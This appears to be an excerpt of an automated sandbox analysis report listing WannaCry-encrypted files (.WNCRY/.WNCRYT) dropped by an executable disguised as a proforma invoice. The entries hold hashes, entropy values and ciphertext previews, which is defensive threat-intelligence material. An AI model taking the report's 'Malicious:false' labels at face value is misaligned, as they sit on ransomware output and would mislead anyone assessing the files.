                                                          Preview:WANACRY!........l.".?.............9..2P.....jE=(....s....a.}p.......Z.u"q..J..><...n..;....].tD0..kb......fp....O...0....w36.J..\.... ..*..4..u..k)...X.....ko.....V...1.CQc}.f...v..<..V.....K.c3q.:.~e.c.p..._h.._;.P.g...B~/..q...o..B..<...`. Q...W................. ..".....S.dT*.y9..t...Ep..HM.....R..u..#..pd.-o.Y....`......x.Bk.+..O..E.r;...X.".xr...C.v.....0..7..........r..j........*6......A]3.1...:.......s.i.....Q.wz...-9U..O..h*..n.!E..I...k.%..l..r.|&r._.b...|G.....WY.|....x.9v...Q...9.-.#RB{B.^S...;..9..klK=....'.S..e.}..+R#.Lrz(.R`.h...++.l.vh...,.....I..3..O...b.Q..5..!!.......s..Aj....%..*.W.^1;.%%T..2.....e......6.Nf....N*..]...,4?.."..<.^......U.64/.......5?...;....wj...........JO.g..G.B...l5[+.../ ...4.A.?..o..M.p.v..v..O8w;....{.N.Hk.6.T..RQ....cL.H.~......B......k...+..u..$.w.............r....4.......o...e.rT....q..!.....{.o1T^.NS..N#.P...R1.."..|...z+.z-..#.D..,e..e.]6.P.)Lk'.....R..R....^.f........2jQ.y.mV......L|....pL`

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834459685105275
                                                          Encrypted:false
                                                          SSDEEP:24:bkBDjmKtulazuSJk2m2ityW0op8KzbiSosgIWXk6wSAcmdBK3fZrWrGhGXlXOon9:bkVqALityWDp3viSjgX0fbcmdQvdWCh2
                                                          MD5:652472DDDF9854896C79BBECB3383DB9
                                                          SHA1:D688FAAFD665AC48E2BEEFA94748A72C29555A7F
                                                          SHA-256:CB1A15AB85EF29C92490D4F2E66D9FB6D2A8B68D67AA04E1171DB0160E095581
                                                          SHA-512:E22B0B4E691D648642C90B5DE3344FA7D85D3741ECA817C507E1904CCD09185A2BB44093558D3D5218763DBCEBB76A9E4ED8CFCBC467AF4D189FF6826F1AF6CB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....}...s...]h.B..x.n.;o^[.....C&u..3.!...>y(/..y(..rH...#..H..m`O...kG..]s.0.5)p.5.-...Z.....T.I}..Ml...........#hHK.09.o...#P......./5dd..j......."-.)......r.`_.Aa.....".4./..X.>S].{..`.k..../d....D.....Wa...=.)W]..B.v..^...~..!'.e.....H7.....J+^............VH.?7....<NE7.S.Y.{..!..N.B....Q.........k...../,j..r{.....U...XS...V.*.SqZl..P....>...>>..<......!...^..@cZ`.'!.;T!...i.......>To.6....F.%...[..../.....f....j.K..2..+'X....x........0z...(.uz..8<.........;...l..$.F...iSz/.Q.i.......D..l...."...w........S..z.....].d.Aj..m. ..@...Z)..$}......* .1.3.6.!>.Rp.Xf...j.%3....s.A..S.=.`.....~.......z.....I.R...@yN.)t2^.].2..]9.SniH....#.....i...C.*.F.l..2.....!OA...!........d/........J..-..`S.B.D{e..T1...v..o..u}..TFi.Mw..../...N..`.....7.P..c.j.\.Ba`TlG.VO.:!..<..!..I.....Z.%..dn.iqm.%.......<@.....Wy.........y..v-..,.`>..8...|A.3......R...8.O.]L.......OL./V|...>..'.37.%...#..6.3l.?nP[.>......X+...m)..4.........V.....h

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834459685105275
                                                          Encrypted:false
                                                          SSDEEP:24:bkBDjmKtulazuSJk2m2ityW0op8KzbiSosgIWXk6wSAcmdBK3fZrWrGhGXlXOon9:bkVqALityWDp3viSjgX0fbcmdQvdWCh2
                                                          MD5:652472DDDF9854896C79BBECB3383DB9
                                                          SHA1:D688FAAFD665AC48E2BEEFA94748A72C29555A7F
                                                          SHA-256:CB1A15AB85EF29C92490D4F2E66D9FB6D2A8B68D67AA04E1171DB0160E095581
                                                          SHA-512:E22B0B4E691D648642C90B5DE3344FA7D85D3741ECA817C507E1904CCD09185A2BB44093558D3D5218763DBCEBB76A9E4ED8CFCBC467AF4D189FF6826F1AF6CB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....}...s...]h.B..x.n.;o^[.....C&u..3.!...>y(/..y(..rH...#..H..m`O...kG..]s.0.5)p.5.-...Z.....T.I}..Ml...........#hHK.09.o...#P......./5dd..j......."-.)......r.`_.Aa.....".4./..X.>S].{..`.k..../d....D.....Wa...=.)W]..B.v..^...~..!'.e.....H7.....J+^............VH.?7....<NE7.S.Y.{..!..N.B....Q.........k...../,j..r{.....U...XS...V.*.SqZl..P....>...>>..<......!...^..@cZ`.'!.;T!...i.......>To.6....F.%...[..../.....f....j.K..2..+'X....x........0z...(.uz..8<.........;...l..$.F...iSz/.Q.i.......D..l...."...w........S..z.....].d.Aj..m. ..@...Z)..$}......* .1.3.6.!>.Rp.Xf...j.%3....s.A..S.=.`.....~.......z.....I.R...@yN.)t2^.].2..]9.SniH....#.....i...C.*.F.l..2.....!OA...!........d/........J..-..`S.B.D{e..T1...v..o..u}..TFi.Mw..../...N..`.....7.P..c.j.\.Ba`TlG.VO.:!..<..!..I.....Z.%..dn.iqm.%.......<@.....Wy.........y..v-..,.`>..8...|A.3......R...8.O.]L.......OL./V|...>..'.37.%...#..6.3l.?nP[.>......X+...m)..4.........V.....h

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BXAJUJAOEO.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854809754693924
                                                          Encrypted:false
                                                          SSDEEP:24:bkTlvRkhiBgoHGSAD+4blL+ZOg1wAyzjM7b6MnQPG6l9wcDMPwUD755YEESIw:bkRvYCHGSMlbNK8zjwbLQ5DMYk5YTSD
                                                          MD5:AF3EEB8465D52EA03FB84507C5647959
                                                          SHA1:E03A0515B5D983AADD73D855820ECD94161364E2
                                                          SHA-256:E9FA4C1C4730CF5404D5F2567E890E360D54D4409401E8DC797259D625F40EEF
                                                          SHA-512:06EF6C31E5E9F41DE859FD04E463D2DDBB6216A4ECCCE7917727C37ECBAC79255EA2C5092E2D20A2A23A72291DD75F0ACB443665EF2F71D82BF20C72416D4FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e....3..`)..vy1..g..^mis..y.I...I..p...!...a"].D...b.o.U.....).j.V..|..Ov.p...`B.N?....Sp....q...P.q...__.9...;w..8..H..... z.2K.7.....b.0i...p...7......v..n|g.....r....h..uB........t:U.e.~....M.Q..X.)........w&.....~`..._...".d...t)Br'....go..................ok...SG.E.L..-<=Fs6.....?....W.m.>2.3..E..P.'..M.:8...H....4T.5...!.]Y.-....]...s.;...0.Em.@.W.4......u.....(..>.._....Za....!_......6...g.D..O...ay$....1..CfI.t.]./.S........[..7_M%VjG#.G.nB.....L....<W..n7N.@..._.%......!...=m'.3.5.G.3v.}...{.Iu.E...K.M>*....)....w.9..of6.>.u....I...J......H.2J...;.2Qr=..BT`.+).B...o..i4yY.......g.../.\U.....|.+..:.u...{.8.M`U.^&]C....+.Q-.........x.Y...m..x..Hx.z2cH.?:.....!.j+..F...(.R.x...Fk._..#K...`U.m.x$......<_..&b...8j.Az..Q.E.!....Aj...Tg.o...s......%..iw...C.u.]..pc.Sn......E....y.W]jj.Y3.<Zh.-.iQ.XV.....,..C.....LI.,...!@...-"v.Ox.};e...o..Z.P.+....Kq.I.z.....I.q...#O"$..fF.R.S<....p...%.p.(..q3U....".....Z.)....e

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BXAJUJAOEO.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854809754693924
                                                          Encrypted:false
                                                          SSDEEP:24:bkTlvRkhiBgoHGSAD+4blL+ZOg1wAyzjM7b6MnQPG6l9wcDMPwUD755YEESIw:bkRvYCHGSMlbNK8zjwbLQ5DMYk5YTSD
                                                          MD5:AF3EEB8465D52EA03FB84507C5647959
                                                          SHA1:E03A0515B5D983AADD73D855820ECD94161364E2
                                                          SHA-256:E9FA4C1C4730CF5404D5F2567E890E360D54D4409401E8DC797259D625F40EEF
                                                          SHA-512:06EF6C31E5E9F41DE859FD04E463D2DDBB6216A4ECCCE7917727C37ECBAC79255EA2C5092E2D20A2A23A72291DD75F0ACB443665EF2F71D82BF20C72416D4FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e....3..`)..vy1..g..^mis..y.I...I..p...!...a"].D...b.o.U.....).j.V..|..Ov.p...`B.N?....Sp....q...P.q...__.9...;w..8..H..... z.2K.7.....b.0i...p...7......v..n|g.....r....h..uB........t:U.e.~....M.Q..X.)........w&.....~`..._...".d...t)Br'....go..................ok...SG.E.L..-<=Fs6.....?....W.m.>2.3..E..P.'..M.:8...H....4T.5...!.]Y.-....]...s.;...0.Em.@.W.4......u.....(..>.._....Za....!_......6...g.D..O...ay$....1..CfI.t.]./.S........[..7_M%VjG#.G.nB.....L....<W..n7N.@..._.%......!...=m'.3.5.G.3v.}...{.Iu.E...K.M>*....)....w.9..of6.>.u....I...J......H.2J...;.2Qr=..BT`.+).B...o..i4yY.......g.../.\U.....|.+..:.u...{.8.M`U.^&]C....+.Q-.........x.Y...m..x..Hx.z2cH.?:.....!.j+..F...(.R.x...Fk._..#K...`U.m.x$......<_..&b...8j.Az..Q.E.!....Aj...Tg.o...s......%..iw...C.u.]..pc.Sn......E....y.W]jj.Y3.<Zh.-.iQ.XV.....,..C.....LI.,...!@...-"v.Ox.};e...o..Z.P.+....Kq.I.z.....I.q...#O"$..fF.R.S<....p...%.p.(..q3U....".....Z.)....e

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DYUINSEKIP.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826923063790363
                                                          Encrypted:false
                                                          SSDEEP:24:bk2is/33Sy1ZsuJ/xA9es5Muij/HbmaB3WTj/1A0y657FSKVi4PUG+dC:bk2is/3B/xA9E/7J3Wf/1pA9PM
                                                          MD5:1674AC271D331BED0D0A6A8A6AB8B889
                                                          SHA1:B5A0B1C067C56F4D3B960D56F3625F92568ECE46
                                                          SHA-256:43389140CBEBF32D0C197D684F5145394163231E9837F18F9162CC830C5D54A9
                                                          SHA-512:1FEE1944C20B9C38FE1D20410EFC03325E8AF11D3572BFDFCA317A135EDB5D578C24A710C9E39DBF1AD19781D90F8DC4840DDA378A98F5F0420916766BDF05DB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$..x..hrM..M....IFQ....".<.{...3..V....x..%.T..6..ug..!...K^7..!.fh#.`8...&.4wm..l......^.n.M]j....z.i........f......}...(.9.K..'.'...?g./..... .,.x..$Pd....:..71k#._..k{......p.....ICG........fR!F...s.3|.4..'<{...msMoN..0...s...k ..J..7t..O.C............+.l..q...3..<...S..R.....I..2vv<.D....C..im.0.2.......P.<.d. bt.w1;y....H....+.@.I...Y..y....W.....=..<L.>r.>.r..D..0......<.....q#.m..SJ.P.OC...vWp`.....M.Fs>=*2..:.I..`".Bv..G......{..\..O..@tdf.v;.U.#.>~......BRk..O.........+......*.B\PSq..gH........l..k.r\....--1j..$_.2k...v.k.`7...=.+F)..+p..^1g.R..6.Z.b!+..r........9....`:.yv..D..!4......E.r.y..IA..+....M..{....2.$.x9*h.......P,...8Uof16.x|.................e1...D...K..g..).o..O.2x..(e.h.=.7a$h2L3...i.......O..1k.[..y..|.jjW..t....7s.....).2.GI....DT.(R.M.+.(...o..zi9{[6.[...hC-LO...."..6)..U....D,.7..el.....^(..<}..m.....].........(9.Q.*GC.....`op...5..D?.v1.i.5...T....TrA..)....$.k.s.H..M.R..U1....L...`..D..IO..@y...

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DYUINSEKIP.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826923063790363
                                                          Encrypted:false
                                                          SSDEEP:24:bk2is/33Sy1ZsuJ/xA9es5Muij/HbmaB3WTj/1A0y657FSKVi4PUG+dC:bk2is/3B/xA9E/7J3Wf/1pA9PM
                                                          MD5:1674AC271D331BED0D0A6A8A6AB8B889
                                                          SHA1:B5A0B1C067C56F4D3B960D56F3625F92568ECE46
                                                          SHA-256:43389140CBEBF32D0C197D684F5145394163231E9837F18F9162CC830C5D54A9
                                                          SHA-512:1FEE1944C20B9C38FE1D20410EFC03325E8AF11D3572BFDFCA317A135EDB5D578C24A710C9E39DBF1AD19781D90F8DC4840DDA378A98F5F0420916766BDF05DB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$..x..hrM..M....IFQ....".<.{...3..V....x..%.T..6..ug..!...K^7..!.fh#.`8...&.4wm..l......^.n.M]j....z.i........f......}...(.9.K..'.'...?g./..... .,.x..$Pd....:..71k#._..k{......p.....ICG........fR!F...s.3|.4..'<{...msMoN..0...s...k ..J..7t..O.C............+.l..q...3..<...S..R.....I..2vv<.D....C..im.0.2.......P.<.d. bt.w1;y....H....+.@.I...Y..y....W.....=..<L.>r.>.r..D..0......<.....q#.m..SJ.P.OC...vWp`.....M.Fs>=*2..:.I..`".Bv..G......{..\..O..@tdf.v;.U.#.>~......BRk..O.........+......*.B\PSq..gH........l..k.r\....--1j..$_.2k...v.k.`7...=.+F)..+p..^1g.R..6.Z.b!+..r........9....`:.yv..D..!4......E.r.y..IA..+....M..{....2.$.x9*h.......P,...8Uof16.x|.................e1...D...K..g..).o..O.2x..(e.h.=.7a$h2L3...i.......O..1k.[..y..|.jjW..t....7s.....).2.GI....DT.(R.M.+.(...o..zi9{[6.[...hC-LO...."..6)..U....D,.7..el.....^(..<}..m.....].........(9.Q.*GC.....`op...5..D?.v1.i.5...T....TrA..)....$.k.s.H..M.R..U1....L...`..D..IO..@y...

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835380095632516
                                                          Encrypted:false
                                                          SSDEEP:24:bkZTDME2p3Qxnh743SzoJnLjyfnUrVl5ImQ3JcxO9AbaNLTlYcZJN:bkZPMEQ3QL7WRBny8rVPzQ3+OWbc/2cB
                                                          MD5:919E1E078C4D3996B6A548820261DE8C
                                                          SHA1:66601A66AFC208001DCFCB663B1983F7FB5EDFC0
                                                          SHA-256:2FF936DA9F73E37635A9C49C846F689060F44F5B4A6D7733F85A002E06BB2013
                                                          SHA-512:A654E9D9B984B3E819E89A211A86B40AF7FB63E0CB18EC4ACC8EFDCBFFAEFC7D9FCFFCD7C5314AEDABA14375E0E1110E447A00E3A249913DC54EA4B4A28C0FA4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....;~.t%_[e.."..rJ*..G.......Q...z..w.?v..n.!Oq....[...1..4.KX.c...)...-D.....D..L2.......@..^.^5.A..8...<9.v....<.....l/...[.R.HeFeG.......n#.+Yay.X..i..m....k.N.>t..J.<..c:......M...,Z./j......*^...B...4Pc.{...6......[A"..h.J....Ie.R...j...../!c(................xe.4..X.,......s=W!....^i.&.k.`.L\..\g.L%..?.2.oY.@.\G...l`..._.Q...#..+.CkB...5..j).M/3D....'..7z..G@2vl[J:.....}..@.X..t..L..5..,...q.,.!..F...&..z=.@.F./a......5h[.x&a..oO.[3{.....`...dF.:.{...r...\.?c...{....&`..x..K....z%.b5.V<.DjTj..!.C..hL....n7..e........\s....$.-E.i..i....1..0&.....0.E8...........96.A..".....1f......J.a..;{....u..:.d_0.......0.k.l.U.,|O.kOLK.#}.8.r.e....../.1..r.f.dI.V|..........BF Ca..A.q......u...:...P...B. t...8.oE..o.~....sd....Ll.C2n.&..e.....Aa.S..r...<.z...]........X..}..{.6..Kh..Y.M.}Jn.7.W....Fi.m..Y8M..l..O>_..PmD..=WSvo.gv.[............Oy.......+....M......q.I.Y..(?#...:....z)=..UpyM..Q1?..x..F..X.R.z.oA.-.C.[..o_.......n.......F+ .^Hk->\.[[

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835380095632516
                                                          Encrypted:false
                                                          SSDEEP:24:bkZTDME2p3Qxnh743SzoJnLjyfnUrVl5ImQ3JcxO9AbaNLTlYcZJN:bkZPMEQ3QL7WRBny8rVPzQ3+OWbc/2cB
                                                          MD5:919E1E078C4D3996B6A548820261DE8C
                                                          SHA1:66601A66AFC208001DCFCB663B1983F7FB5EDFC0
                                                          SHA-256:2FF936DA9F73E37635A9C49C846F689060F44F5B4A6D7733F85A002E06BB2013
                                                          SHA-512:A654E9D9B984B3E819E89A211A86B40AF7FB63E0CB18EC4ACC8EFDCBFFAEFC7D9FCFFCD7C5314AEDABA14375E0E1110E447A00E3A249913DC54EA4B4A28C0FA4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....;~.t%_[e.."..rJ*..G.......Q...z..w.?v..n.!Oq....[...1..4.KX.c...)...-D.....D..L2.......@..^.^5.A..8...<9.v....<.....l/...[.R.HeFeG.......n#.+Yay.X..i..m....k.N.>t..J.<..c:......M...,Z./j......*^...B...4Pc.{...6......[A"..h.J....Ie.R...j...../!c(................xe.4..X.,......s=W!....^i.&.k.`.L\..\g.L%..?.2.oY.@.\G...l`..._.Q...#..+.CkB...5..j).M/3D....'..7z..G@2vl[J:.....}..@.X..t..L..5..,...q.,.!..F...&..z=.@.F./a......5h[.x&a..oO.[3{.....`...dF.:.{...r...\.?c...{....&`..x..K....z%.b5.V<.DjTj..!.C..hL....n7..e........\s....$.-E.i..i....1..0&.....0.E8...........96.A..".....1f......J.a..;{....u..:.d_0.......0.k.l.U.,|O.kOLK.#}.8.r.e....../.1..r.f.dI.V|..........BF Ca..A.q......u...:...P...B. t...8.oE..o.~....sd....Ll.C2n.&..e.....Aa.S..r...<.z...]........X..}..{.6..Kh..Y.M.}Jn.7.W....Fi.m..Y8M..l..O>_..PmD..=WSvo.gv.[............Oy.......+....M......q.I.Y..(?#...:....z)=..UpyM..Q1?..x..F..X.R.z.oA.-.C.[..o_.......n.......F+ .^Hk->\.[[

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8111310662104865
                                                          Encrypted:false
                                                          SSDEEP:24:bkzXP2bbUHrphDDv7G1+a0HT2xkolty2zYwIi8NAUXfzJW0QbTFTovg0SRg:bkzXP2bmPy1+ajSSpzYwIi8HXfzJWLTO
                                                          MD5:5BC1B4CF5C4AF8C6742967A68A390146
                                                          SHA1:E64F9D68038974AE496019E8002975E926AD6A40
                                                          SHA-256:6AC8EF68CFB83C82419DC3E313914E4DFC6A81CC04D6A21CC4B81447D1C0A742
                                                          SHA-512:F701705103B8A289A93E879C373BEFB96B68EFDC7640C0CBD9B3F7E8BA744142321076CE3C7555AE46EC728235B0047C69AF0876F8A60B0801F84612D95E5D61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......].....jK...(...i.;......R.:.y#.g......26..|.F..z.P3.LF.5.....L.G..U...8\.4...f............ ..ej&.....]'. }/.m...F...Ms.n.`........q.:..%Bh...R.gCMv<R(....p.&JD:la..e`........U.0lY#@....@.5s! ..r...32....x..u0.7-hMR.8_..C..h!..%.#8.8.]'$.1..;............l...$&@f....)Yr@.........<2..HEU....')....7K`...._....t..D.*>"J+.,6$....T7....U..gSg9.....-......Ab.Q....R....x..G]!fC..c.I...A.......;S...L..ea....X..2.b..`...!.$...,....R..7..u..cxu..e..\.q...).r...Kg.M.C%....q'..nyO..5.5.E..R..^.U8.L....G...;`....MP.iIn.{.2...!2...p...H.....p.\[sz...)Q.9.0|$.wP..n*.Q.Hy"...~.X<.A`.w. ....WQ.hzUD..v..u..Y8.i........I..p..o..:..w......u..O...X...L..T.!f.'...U.Q.L.b..K..F......$t..9...R..D..q.......^w7E.d. O.@.37.=9|{..q.jY3...L.8u...q...6mPJv...-...E...G.Y.2.....{a......."Z..q._..K?c...aI...Ox.Z..JK.u.>.wi&..*...+.5.[......P..kn..Go.|.:.?.GcMY...v{.8sfX.<....wx..S#..d.XJ.Y1`..]...G.#J`|.'.e`..I..n......p.E.....7......R.f.........6.O..&6I|.h0sP..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8111310662104865
                                                          Encrypted:false
                                                          SSDEEP:24:bkzXP2bbUHrphDDv7G1+a0HT2xkolty2zYwIi8NAUXfzJW0QbTFTovg0SRg:bkzXP2bmPy1+ajSSpzYwIi8HXfzJWLTO
                                                          MD5:5BC1B4CF5C4AF8C6742967A68A390146
                                                          SHA1:E64F9D68038974AE496019E8002975E926AD6A40
                                                          SHA-256:6AC8EF68CFB83C82419DC3E313914E4DFC6A81CC04D6A21CC4B81447D1C0A742
                                                          SHA-512:F701705103B8A289A93E879C373BEFB96B68EFDC7640C0CBD9B3F7E8BA744142321076CE3C7555AE46EC728235B0047C69AF0876F8A60B0801F84612D95E5D61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......].....jK...(...i.;......R.:.y#.g......26..|.F..z.P3.LF.5.....L.G..U...8\.4...f............ ..ej&.....]'. }/.m...F...Ms.n.`........q.:..%Bh...R.gCMv<R(....p.&JD:la..e`........U.0lY#@....@.5s! ..r...32....x..u0.7-hMR.8_..C..h!..%.#8.8.]'$.1..;............l...$&@f....)Yr@.........<2..HEU....')....7K`...._....t..D.*>"J+.,6$....T7....U..gSg9.....-......Ab.Q....R....x..G]!fC..c.I...A.......;S...L..ea....X..2.b..`...!.$...,....R..7..u..cxu..e..\.q...).r...Kg.M.C%....q'..nyO..5.5.E..R..^.U8.L....G...;`....MP.iIn.{.2...!2...p...H.....p.\[sz...)Q.9.0|$.wP..n*.Q.Hy"...~.X<.A`.w. ....WQ.hzUD..v..u..Y8.i........I..p..o..:..w......u..O...X...L..T.!f.'...U.Q.L.b..K..F......$t..9...R..D..q.......^w7E.d. O.@.37.=9|{..q.jY3...L.8u...q...6mPJv...-...E...G.Y.2.....{a......."Z..q._..K?c...aI...Ox.Z..JK.u.>.wi&..*...+.5.[......P..kn..Go.|.:.?.GcMY...v{.8sfX.<....wx..S#..d.XJ.Y1`..]...G.#J`|.'.e`..I..n......p.E.....7......R.f.........6.O..&6I|.h0sP..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.860375167409036
                                                          Encrypted:false
                                                          SSDEEP:24:bk0gZWMNEiaQtk9MvVtIOZPWDqhRSC4luejE+2u4HBEy5yOcuLTwHA:bkmMNL7CMvt4wRSC4xoEyIocHA
                                                          MD5:19E7838770B0EFA07C97532165312D40
                                                          SHA1:BE1BEBF4823853F3B8FB4FAF135303FB401C7C64
                                                          SHA-256:C84F06FA77379D9CAC7482388F6CBBF5A59674CA7C34853B13F45DF624FE16E7
                                                          SHA-512:0D2634CE003380501957DEBA0122952CAB5C2D476AD985B9C9BAB3214AACDDF240F605B40C9E8E3A2E244FEDB225BC65EDDD96AB947D6F58714F6099E2457C47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......;..\..?.$.S..{.0....B.'n...Y..;Ms|K.T.\&,d...O.UG.@.l...p.f<|../Y...A.....(....f..X..e...6C.Y.!_.....L.-.4...4.....!..A....(.y..ED9......*/..h..X....T{U;kt...,i.'........R&.h..?..itR.!..Dk...C=.(..,0...`...h'....Y...gw....#...n>....eYw...K.m.............'T;.<...5 .&.........u..CS.....d..}...G.^n...B.f.,...W....g.......6...k..$Q5.&>..pZD3...7.?..C(].u...s.cqbq....+...?..._.d..K bR..#.!y...^2.&....4.k..1..U?)...}...]....F.v&h...0y..=.....8.0..'.. .-.P.!`ts.S#.n4%;%.d.x.^...W..}.%.4.....bw..1i...k...R.\..'...#....X.L....il..S...C.....!./.I...>....Xv0vb.m............on...g.v.....n........-...Mj..-.....>r..Yr.`.....2.r...+I.;./J...9.(...^..R...Dk...........r|.P.G..n..2.1.^.1..6.B-...4..;..U-.u......&m.o.G..*T.+.]3...,.dV.....R.X..E.2-.....f..Q.[.A......;.Y....8..>.l.U.........L..93.Bo.d..#........-...5..%.@.q4+HW.QD.....R..'..6.....D"..<F...8=....(..'..&..^...%...@#.2..X*..?.U...X..U..i..g.qK....B.y..........D....ZQ.H..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.860375167409036
                                                          Encrypted:false
                                                          SSDEEP:24:bk0gZWMNEiaQtk9MvVtIOZPWDqhRSC4luejE+2u4HBEy5yOcuLTwHA:bkmMNL7CMvt4wRSC4xoEyIocHA
                                                          MD5:19E7838770B0EFA07C97532165312D40
                                                          SHA1:BE1BEBF4823853F3B8FB4FAF135303FB401C7C64
                                                          SHA-256:C84F06FA77379D9CAC7482388F6CBBF5A59674CA7C34853B13F45DF624FE16E7
                                                          SHA-512:0D2634CE003380501957DEBA0122952CAB5C2D476AD985B9C9BAB3214AACDDF240F605B40C9E8E3A2E244FEDB225BC65EDDD96AB947D6F58714F6099E2457C47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......;..\..?.$.S..{.0....B.'n...Y..;Ms|K.T.\&,d...O.UG.@.l...p.f<|../Y...A.....(....f..X..e...6C.Y.!_.....L.-.4...4.....!..A....(.y..ED9......*/..h..X....T{U;kt...,i.'........R&.h..?..itR.!..Dk...C=.(..,0...`...h'....Y...gw....#...n>....eYw...K.m.............'T;.<...5 .&.........u..CS.....d..}...G.^n...B.f.,...W....g.......6...k..$Q5.&>..pZD3...7.?..C(].u...s.cqbq....+...?..._.d..K bR..#.!y...^2.&....4.k..1..U?)...}...]....F.v&h...0y..=.....8.0..'.. .-.P.!`ts.S#.n4%;%.d.x.^...W..}.%.4.....bw..1i...k...R.\..'...#....X.L....il..S...C.....!./.I...>....Xv0vb.m............on...g.v.....n........-...Mj..-.....>r..Yr.`.....2.r...+I.;./J...9.(...^..R...Dk...........r|.P.G..n..2.1.^.1..6.B-...4..;..U-.u......&m.o.G..*T.+.]3...,.dV.....R.X..E.2-.....f..Q.[.A......;.Y....8..>.l.U.........L..93.Bo.d..#........-...5..%.@.q4+HW.QD.....R..'..6.....D"..<F...8=....(..'..&..^...%...@#.2..X*..?.U...X..U..i..g.qK....B.y..........D....ZQ.H..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JJMNFRKQNU.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845741568766271
                                                          Encrypted:false
                                                          SSDEEP:24:bkuxQG28YZnmGpMfyhGKSxHypDPAR94z6GE5eaEPwIqSIeVu/PXtiPZ4E:bkZG28YZ3M2GKS1ypDPAR94z6b5O1qSx
                                                          MD5:0603AF8BA5579C3B4E71F592B2B4773C
                                                          SHA1:E9B3B04AB28C7F8F99A41AFC8A5821354607766A
                                                          SHA-256:5FC2E52A5E481D4A90A0DED431983B89B00F93D533DE25C8B1BF7766837527FA
                                                          SHA-512:985BEDD8522C5575D04E5B8614499AB57045F35AA4083A7DBF4D48D9C67FCC174119D231DEAB349198B3FB320DA32A9E562C72C5CBF3EBA0454D8D28AD19DB34
                                                          Malicious:false
                                                          Reputation:unknown
